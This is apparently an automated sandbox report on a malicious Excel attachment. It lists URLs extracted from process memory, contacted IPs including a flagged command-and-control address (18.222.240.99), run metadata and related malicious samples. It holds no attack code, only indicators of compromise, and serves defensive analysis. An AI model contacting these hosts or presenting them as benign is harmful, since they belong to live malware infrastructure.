    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    		unknown
    http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
      		high
      https://18.222.240.99/qOhrundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.chambersign.org1cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://www.pkioverheid.nl/policies/root-policy0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      		unknown
      http://repository.swisssign.com/0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        		high
        http://www.suscerte.gob.ve/lcr0#cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://crl.ssc.lt/root-c/cacrl.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://postsignum.ttc.cz/crl/psrootqca2.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crlcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://ca.disig.sk/ca/crl/ca_disig.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.certplus.com/CRL/class3P.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.suscerte.gob.ve/dpc0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        • URL Reputation: safe
        		unknown
        http://www.certeurope.fr/reference/root2.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
          		high
          http://www.certplus.com/CRL/class2.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://www.disig.sk/ca/crl/ca_disig.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          		unknown
          http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
            		high
            http://www.defence.gov.au/pki0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.sk.ee/cps/0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.globaltrust.info0=cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		low
            http://www.anf.escmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
              		high
              http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                		high
                http://pki.registradores.org/normativa/index.htm0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                  		high
                  http://policy.camerfirma.com0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.ssc.lt/cps03cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://ocsp.pki.gva.es0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.anf.es/es/address-direccion.htmlcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                    		high
                    https://www.anf.es/address/)1(0&cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                      		high
                      http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      https://18.222.240.99/hOgrundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://ca.mtin.es/mtin/ocsp0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://crl.ssc.lt/root-b/cacrl.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://web.ncdc.gov.sa/crl/nrcacomb1.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.certicamara.com/dpc/0Zcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                        		high
                        http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0Gcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://crl.pki.wellsfargo.com/wsprca.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                          		high
                          https://18.222.240.99/update/infoyrundll32.exe, 00000001.00000003.801717651.00000000030BE000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://wwww.certigna.fr/autorites/0mcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.dnie.es/dpc0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://ca.mtin.es/mtin/DPCyPoliticas0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          https://www.anf.es/AC/ANFServerCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                            		high
                            http://www.globaltrust.info0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://certificates.starfieldtech.com/repository/1604cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                              		high
                              http://acedicom.edicomgroup.com/doc0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                		high
                                http://www.certplus.com/CRL/class3TS.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://crl.anf.es/AC/ANFServerCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.certeurope.fr/reference/pc-root2.pdf0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                    		high
                                    http://ac.economia.gob.mx/last.crl0Gcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.catcert.net/verarrelcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.disig.sk/ca0fcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.e-szigno.hu/RootCA.crlcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.sk.ee/juur/crl/0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.chambersign.org/chambersignroot.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.xrampsecurity.com/XGCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://certs.oati.net/repository/OATICA2.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://crl.oces.trust2408.com/oces.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.quovadis.bm0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://eca.hinet.net/repository0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          		high
                                          http://crl.ssc.lt/root-a/cacrl.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://certs.oaticerts.com/repository/OATICA2.crlcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.trustdst.com/certificates/policy/ACES-index.html0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://certs.oati.net/repository/OATICA2.crt0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.accv.es00cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.pkioverheid.nl/policies/root-policy-G20cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          https://www.netlock.net/docscmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		unknown
                                          http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                            		high
                                            https://18.222.240.99/rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.e-trust.be/CPS/QNcertscmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://ocsp.ncdc.gov.sa0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://html4/loose.dtdcmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://fedir.comsign.co.il/crl/ComSignCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://web.ncdc.gov.sa/crl/nrcaparta1.crlcmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.datev.de/zertifikat-policy-int0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              		high
                                              http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              https://repository.luxtrust.lu0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://cps.chambersign.org/cps/chambersroot.html0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.acabogacia.org0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://ocsp.eca.hinet.net/OCSP/ocspG2sha20cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.firmaprofesional.com/cps0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.uce.gub.uy/acrn/acrn.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://.csscmd.exe, 00000007.00000002.972902437.00000000047D0000.00000002.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://crl.securetrust.com/SGCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://18.222.240.99/versalrundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.agesic.gub.uy/acrn/acrn.crl0)cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://18.222.240.99/gO~rundll32.exe, 00000001.00000002.802536154.000000000308A000.00000004.00000020.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://crl.securetrust.com/STCA.crl0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.rcsc.lt/repository0cmd.exe, 00000007.00000002.976016305.0000000005040000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown

                                                  Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  104.21.64.132
                                                  		otusmail.comUnited States
                                                  		13335CLOUDFLARENETUSfalse
                                                  18.222.240.99
                                                  		unknownUnited States
                                                  		16509AMAZON-02UStrue
                                                  54.163.9.216
                                                  		unknownUnited States
                                                  		14618AMAZON-AESUSfalse

                                                  General Information

                                                  Joe Sandbox Version:32.0.0 Black Diamond
                                                  Analysis ID:403285
                                                  Start date:04.05.2021
                                                  Start time:01:12:23
                                                  Joe Sandbox Product:CloudBasic
                                                  Overall analysis duration:0h 8m 11s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:light
                                                  Sample file name:Documents_111651917_375818984.xls
                                                  Cookbook file name:defaultwindowsofficecookbook.jbs
                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                  Run name:Potential for more IOCs and behavior
                                                  Number of analysed new started processes analysed:9
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • HDC enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Detection:MAL
                                                  Classification:mal100.expl.evad.winXLS@5/13@1/3
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HDC Information:
                                                  • Successful, ratio: 35.5% (good quality ratio 33.5%)
                                                  • Quality average: 78.3%
                                                  • Quality standard deviation: 29.4%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Adjust boot time
                                                  • Enable AMSI
                                                  • Found application associated with file extension: .xls
                                                  • Found Word or Excel or PowerPoint or XPS Viewer
                                                  • Attach to Office via COM
                                                  • Scroll down
                                                  • Close Viewer
                                                  Warnings:
                                                  Show All
                                                  • Excluded IPs from analysis (whitelisted): 52.113.196.254, 52.147.198.201, 104.43.193.48, 13.107.4.50, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 92.122.145.53, 2.20.142.210, 2.20.142.209
                                                  • TCP Packets have been reduced to 100
                                                  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, Edge-Prod-FRAr4a.env.au.au-msedge.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, c-0001.c-msedge.net, a767.dscg3.akamai.net, afdap.au.au-msedge.net, skypedataprdcolcus15.cloudapp.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, skypedataprdcoleus16.cloudapp.net, teams-9999.teams-msedge.net, www.microsoft.com-c-3.edgekey.net, au.au-msedge.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, au.c-0001.c-msedge.net, teams-ring.teams-9999.teams-msedge.net, watson.telemetry.microsoft.com, elasticShed.au.au-msedge.net, microsoft.com, teams-ring.msedge.net, au-bg-shim.trafficmanager.net, www.microsoft.com
                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                  • Report size getting too big, too many NtWriteVirtualMemory calls found.

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  01:14:35API Interceptor15x Sleep call for process: cmd.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                  104.21.64.132Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                    18.222.240.99Documents_95326461_1831689059.xlsGet hashmaliciousBrowse

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      otusmail.comDocuments_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 172.67.151.10
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 104.21.64.132

                                                      ASN

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      AMAZON-02US4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                      • 52.32.122.68
                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 54.72.3.133
                                                      #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                      • 143.204.98.42
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 3.134.106.170
                                                      0d69e4f6_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                      • 99.83.154.118
                                                      d630fc19_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                                      • 52.219.40.51
                                                      presupuesto.xlsxGet hashmaliciousBrowse
                                                      • 143.204.202.49
                                                      Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                                      • 3.34.241.29
                                                      O1E623TjjW.exeGet hashmaliciousBrowse
                                                      • 52.52.155.86
                                                      file.exeGet hashmaliciousBrowse
                                                      • 52.15.160.167
                                                      PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                      • 3.14.18.91
                                                      80896e11_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 3.141.142.211
                                                      QxnqOxC0qE.exeGet hashmaliciousBrowse
                                                      • 52.14.161.64
                                                      ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                                      • 3.34.241.29
                                                      DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                                      • 99.86.2.5
                                                      nT7K5GG5kmGet hashmaliciousBrowse
                                                      • 35.155.184.95
                                                      Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                      • 99.83.224.11
                                                      fI1YXJEuz5.exeGet hashmaliciousBrowse
                                                      • 99.83.154.118
                                                      wSBbLKrAti.exeGet hashmaliciousBrowse
                                                      • 99.83.154.118
                                                      qRTSlJsJb7.exeGet hashmaliciousBrowse
                                                      • 99.83.154.118
                                                      AMAZON-AESUSdetection.exeGet hashmaliciousBrowse
                                                      • 3.212.215.225
                                                      4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                      • 52.202.22.6
                                                      #U260e#Ufe0fAUDIO-2020-05-26-18-51-m4a_MP4messages_2202-434.htmGet hashmaliciousBrowse
                                                      • 23.21.53.13
                                                      OB74.vbsGet hashmaliciousBrowse
                                                      • 54.91.196.22
                                                      3e98fa2d_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 54.235.83.248
                                                      file.exeGet hashmaliciousBrowse
                                                      • 3.223.115.185
                                                      Outstanding Payment Plan.xlsGet hashmaliciousBrowse
                                                      • 3.227.195.104
                                                      0429_1556521897736.doc_berd.dllGet hashmaliciousBrowse
                                                      • 54.225.169.203
                                                      KnAY2OIPI3Get hashmaliciousBrowse
                                                      • 54.161.176.221
                                                      Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                      • 3.223.115.185
                                                      pVrqrGltiL.exeGet hashmaliciousBrowse
                                                      • 3.233.171.147
                                                      b3516494_by_Libranalysis.xlsGet hashmaliciousBrowse
                                                      • 3.223.115.185
                                                      e3d5e715_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 54.243.121.36
                                                      presentation.jarGet hashmaliciousBrowse
                                                      • 34.202.206.65
                                                      presentation.jarGet hashmaliciousBrowse
                                                      • 3.212.50.245
                                                      8f66.xls.exeGet hashmaliciousBrowse
                                                      • 54.225.169.203
                                                      berd.b.dllGet hashmaliciousBrowse
                                                      • 54.225.169.203
                                                      information_178_sj.xlsxGet hashmaliciousBrowse
                                                      • 100.24.100.138
                                                      information_178_sj.xlsxGet hashmaliciousBrowse
                                                      • 100.24.100.138
                                                      efax637637637.htmGet hashmaliciousBrowse
                                                      • 50.16.177.212
                                                      CLOUDFLARENETUSDocuments_111651917_375818984.xlsGet hashmaliciousBrowse
                                                      • 172.67.151.10
                                                      813oo3jeWE.exeGet hashmaliciousBrowse
                                                      • 104.23.98.190
                                                      4GGwmv0AJm.exeGet hashmaliciousBrowse
                                                      • 23.227.38.32
                                                      c647b2da_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.26.13.9
                                                      FzDN7GfLRo.exeGet hashmaliciousBrowse
                                                      • 162.159.137.232
                                                      Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Yeni sipari#U015f _WJO-001, pdf.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 172.67.151.10
                                                      Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 104.21.64.132
                                                      5c542bb5_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.21.84.93
                                                      6a9b0000.da.dllGet hashmaliciousBrowse
                                                      • 104.20.184.68
                                                      6ba90000.da.dllGet hashmaliciousBrowse
                                                      • 104.20.184.68
                                                      5c542bb5_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 104.21.84.93
                                                      s.dllGet hashmaliciousBrowse
                                                      • 104.20.185.68
                                                      setup-lightshot.exeGet hashmaliciousBrowse
                                                      • 104.23.139.12
                                                      s.dllGet hashmaliciousBrowse
                                                      • 104.20.185.68
                                                      74ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 23.227.38.74
                                                      Bank payment return x.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200
                                                      471e3984_by_Libranalysis.docxGet hashmaliciousBrowse
                                                      • 104.22.1.232
                                                      SecuriteInfo.com.Trojan.GenericKD.36812138.16843.exeGet hashmaliciousBrowse
                                                      • 104.21.19.200

                                                      JA3 Fingerprints

                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                      51c64c77e60f3980eea90869b68c58a8Documents_95326461_1831689059.xlsGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      BUG-92361_FN-Less-Sig_dl.dllGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      395d57a0_by_Libranalysis.exeGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      VTBLdOa3Bk.exeGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
                                                      XiB9vZTRe5.exeGet hashmaliciousBrowse
                                                      • 18.222.240.99
                                                      • 54.163.9.216
